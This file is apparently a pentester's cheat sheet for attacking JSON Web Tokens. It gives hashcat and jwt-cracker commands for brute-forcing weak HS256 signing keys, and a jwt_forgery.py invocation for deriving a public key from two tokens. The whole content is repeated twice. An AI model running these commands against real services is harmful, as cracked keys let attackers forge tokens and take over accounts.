sathishshan/jwt_attack.txt

## jwt_attack.txt
HS256 - Weak Signing Key: Brute Force

hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list

npm install jwt-cracker
jwt-cracker <token> [<alphabet>] [<maxLength>]

HS256 - Extracting Public Key from JWT token:

https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
python3 jwt_forgery.py <token1> <token2>
	HS256 - Weak Signing Key: Brute Force

	hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list

	npm install jwt-cracker
	jwt-cracker <token> [<alphabet>] [<maxLength>]

	HS256 - Extracting Public Key from JWT token:

	https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
	python3 jwt_forgery.py <token1> <token2>